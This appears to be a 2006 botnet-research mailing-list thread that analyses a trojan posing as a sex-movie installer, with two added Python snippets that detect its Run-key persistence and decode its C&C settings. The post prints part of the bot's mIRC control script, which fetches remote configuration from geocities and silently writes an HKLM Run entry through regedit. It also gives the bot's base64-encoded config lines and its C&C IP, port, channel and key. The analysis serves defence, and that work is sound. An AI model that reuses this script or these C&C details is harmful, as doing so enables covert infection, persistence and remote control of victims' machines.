To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
UPDATE as of 05:30 GMT 03/20/06
Wiretapp/Nicholas Albright further analyzed the binary and determined that
it put a file, "svchost.exe", in \windows\fonts. In that directory, several
files with very recent creation dates were discovered.
The first file contains what appears to be the strings that comprise
sections of the USER string. A section is listed below:
The Ancient One.
524c5231-Mozilla/4.0 (compatible; MSIE 6.0; Window
the smartest beast around
Call 911
Bot Oficial do CaNaL Benguela
ele
Jasbir Singh
g
JonSmif's bot
/dev/null .
Property of ecko
The second file contains what appears to be the NICK strings that are
assigned to the controlled mIRC client.
Badri
Baerbel
Bagher
Balasamy
Baoguang
Barba
Bart
Basar
Basia
Bayraktar
Bean-San
Beat
Beate
Belinda
Bencheng
Ben-chieh
The third file contains what appears to be the mIRC scripting code used to
control the bot client installed by the malware. A segment is listed below:
(Thanks to obso for cleaning this up for us)
on 1:connect:
/.clearall |
.timer -m 10 200 /.clearall |
if ($readini($nopath($mircini), typecon, type) == 3)
{
.timerjo 1 5 .join -n $decode(Iy5XYXIu,m) $left($nopath($mircexe),3) $+ $right($mircexe,3)
} |
if ($readini($nopath($mircini), timed, time1) != $day)
{
.sockopen zair www.geocities.com 80
}
alias thatdO
{
return $replace($1-,d0that,[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run])
}
alias thatd0
{
set %mircdir $replace($mircexe,\,\\) |
set %filetoboot $rand(1000,9999) $+ .reg |
write %filetoboot REGEDIT4 |
write %filetoboot $thatdO(d0that) |
write %filetoboot $+("windows"=",%mircdir,") |
.run -n regedit /s %filetoboot |
.timer 1 4 remove %filetoboot |
.timer 1 5 unset %filetoboot |
.timer 1 6 unset %mircdir
Shadowserver will continue to monitor this and keep you updated on any new
developments.
Andre'
--
SemperSecurus
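Added example, not from the post or from obso's cleanup: a small Python checker for the persistence the thatd0 alias above sets up. It parses a REGEDIT4 export and flags Run entries like the "windows" value the script's generated .reg file creates; the export text and paths are constructed placeholders.

```python
import re

# Run key the .reg file written by the thatd0 alias targets (from the script above).
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed REGEDIT4 text shaped like that file: a "windows" value pointing at the
# renamed mIRC binary in \windows\fonts, plus a made-up benign entry for contrast.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"windows"="C:\\WINDOWS\\Fonts\\svchost.exe"
"Updater"="C:\\Program Files\\Example\\updater.exe"
"""

SECTION = re.compile(r"^\[(?P<key>[^\]]+)\]$")
STRING_VALUE = re.compile(r'^"(?P<name>[^"]*)"="(?P<data>.*)"$')

def parse_regedit4(text):
    """Return {key_path: {value_name: data}} for the string values of a REGEDIT4 export."""
    entries, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION.match(line)
        if m:
            current = m.group("key")
            entries.setdefault(current, {})
            continue
        m = STRING_VALUE.match(line)
        if m and current is not None:
            # REGEDIT4 doubles backslashes inside string data; undo that
            entries[current][m.group("name")] = m.group("data").replace("\\\\", "\\")
    return entries

def suspicious_run_entries(entries):
    """Flag Run values that launch something from a Fonts directory, launch a mIRC
    binary, or use the "windows" value name the script's .reg file creates."""
    hits = []
    for key, values in entries.items():
        if key.lower() != RUN_KEY.lower():
            continue
        for name, data in values.items():
            target = data.lower()
            if "\\fonts\\" in target or target.endswith("mirc.exe") or name.lower() == "windows":
                hits.append((name, data))
    return hits
```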
-----Original Message-----
From: Andre' - SemperSecurus [mailto:[EMAIL PROTECTED]
Sent: Sunday, March 19, 2006 6:12 PM
To: [email protected]
Subject: [botnets] New Bot controlling Mirc client ?
I came across a malicious binary via a link to the following:
http://82. 38.6.249:5200/sex
At this point, it looks like the IP for the malware has changed; I'll let
the group know when I discover the new address.
The file installs a program that supposedly allows you to watch sex movies
on your PC.
Preliminary analysis of the file shows the following:
* The program launches what looks to be a legitimate Windows installer
program.
* Upon completion of the installation, a mIRC client is launched in the
background which connects to IRC.
* The pcap of the network session shows that a configuration or mIRC
scripting file of some kind is grabbed from
www.geocities.com/xA1r5/rehaz.htm. There are actually 5 locations from which
a file can be grabbed, www.geocities.com/xA1r?/rehaz.htm, where ? is 1-5.
* After wget of the file, the following is noted:
za!r /.tmd
ZA!r /.rd1 typecon type 3
za!r /.rd1 typecon typed
KJlj0OnlkJnkmeljjnkJ908N-kmlOOM;/!tojHNJHN.kmn9ygkl89HB.AtHKJJSDAJDS.KAJD.AS
JDcxKJD
za!r /.rd1 wcnt 1 4,2
za!r /.rd1 wcnt 2 9,2
za!r /.rd1 wcnt 3 17,1
za!r /.rd1 webcodes posa 5
za!r /.rd1 webcodes webcode5 F!PxAl321r47jKlU57kLW/Ilo0rnbKJjkIjeh7698sfl
za!r /.rd1 webcodes webcode4 F!PxAl321r47jKlU47kLW/Ilo0rnbKJjkIjeh7698sfl
za!r /.rd1 webcodes webcode3 F!PxAl321r47jKlU37kLW/Ilo0rnbKJjkIjeh7698sfl
za!r /.rd1 webcodes webcode2 FokxAl321r47jKlU27ko!/Ilo0rnbKJjkIjeh76fNalz
za!r /.rd1 webcodes webcode1 FokxAl321r47jKlU17ko!/Ilo0rnbKJjkIjeh76fNalz
za!r /.rd1 cntserv 1 13,1
za!r /.rd1 cntserv 2 8,2
za!r /.rd1 cntserv 3 68,1
za!r /.rd srv LkIwbmUuY29t
za!r /.rd prt NTAwNg==
za!r /.timer 1 3 $iif(warnet != $network,.server mlks.<removed> 5006)
* The srv LkIwbmUuY29t and prt NTAwNg== lines appear to be base64 encoded
which when decrypted yield the domain name and the port number.
This file most likely allows the bot operator to control the mIRC client via
the web page file. If he needs to modify the behavior of the client, he can
do it via the web page file.
* During the launch of the mIRC client on the infected computer, Windows
Media Player starts and displays a frame of a sex movie.
* The format of the NICK and USER strings does not appear to be random
characters, as multiple execution runs of the file yielded English words as
segments of the USER string, and the NICK strings seemed to have a pattern
to them as well.
* It does not appear to be possible to properly join the channel unless
certain MODE and WATCH commands are passed.
I will continue to monitor the bot and study the malware and the config
files to try and obtain more information.
At this point, the bot is pretty quiet; I have only seen the following
command over the past few hours:
[WARNET] ( 86.137.160.146:5006) -> :[EMAIL PROTECTED] MODE #.war. -b *!*@212.21.*
If anyone can shed any further light on the commands shown in the config
file above, it would be a huge help.
The following is the C&C information I have so far:
Server hostname: mlks.<removed>
Server IP: 86.137.160.146
Port: 5006
Server Password: [none]
NICK string: Teh-Wei
USER string: Eeke "hotmail.com " "mlks.<removed>" :Hi! I'm a human! What are you?
Channel: #.War.
Channel Key: svcexe
Bot population: ~200
Report on Sex_Movies.avi.exe -
********************************************
MD5: e867443d92ae809cc12150375d43bbf2
AVG: No Virus Found
BitDefender: No Virus Found
ClamAV: Trojan.Muldrop.744
F-Prot: No Virus Found
Andre'
--
SemperSecurus
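Added example, not part of Andre's post: a Python parser for the pushed config lines shown above that decodes the base64 srv/prt fields (the same encoding as the $decode(Iy5XYXIu,m) token in the script segment from the update) to recover the C&C endpoint. The sample lines are constructed to match the capture's format; the srv host is a placeholder, not the capture's token.

```python
import base64
import re

# Constructed sample in the format of the captured "za!r /.rd ..." lines; the srv
# token is a placeholder host, not the capture's value, prt is the captured NTAwNg==.
SAMPLE_CONFIG = """\
za!r /.tmd
ZA!r /.rd1 typecon type 3
za!r /.rd1 typecon typed
za!r /.rd1 cntserv 1 13,1
za!r /.rd srv %s
za!r /.rd prt NTAwNg==
za!r /.timer 1 3 $iif(warnet != $network,.server example 5006)
""" % base64.b64encode(b"c2.example.invalid").decode()

CONFIG_LINE = re.compile(r"^(?P<nick>\S+)\s+/\.(?P<cmd>rd1?|\w+)\s*(?P<rest>.*)$")
BASE64_KEYS = {"srv", "prt"}  # fields the post identifies as base64 (mIRC $decode(...,m))

def b64_text(token):
    """Decode a base64 token to ASCII text, or return None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None

def parse_config(text):
    """Split the pushed config into top-level settings, ini-style sections and other commands."""
    cfg = {"settings": {}, "sections": {}, "other": []}
    for line in text.splitlines():
        m = CONFIG_LINE.match(line.strip())
        if not m:
            continue
        cmd, rest = m.group("cmd"), m.group("rest").split(maxsplit=2)
        if cmd == "rd" and len(rest) == 2:        # /.rd <key> <value>
            key, value = rest
            decoded = b64_text(value) if key in BASE64_KEYS else None
            cfg["settings"][key] = {"raw": value, "decoded": decoded}
        elif cmd == "rd1" and len(rest) >= 2:     # /.rd1 <section> <key> [<value>]
            section, key = rest[0], rest[1]
            cfg["sections"].setdefault(section, {})[key] = rest[2] if len(rest) == 3 else ""
        else:                                     # .tmd, .timer and anything unparsed
            cfg["other"].append(line.strip())
    return cfg

def c2_endpoint(cfg):
    """(host, port) from the decoded srv/prt settings, or None if either is missing."""
    host = cfg["settings"].get("srv", {}).get("decoded")
    port = cfg["settings"].get("prt", {}).get("decoded")
    return (host, int(port)) if host and port and port.isdigit() else None
```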
_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and
server information are public and available to law enforcement upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets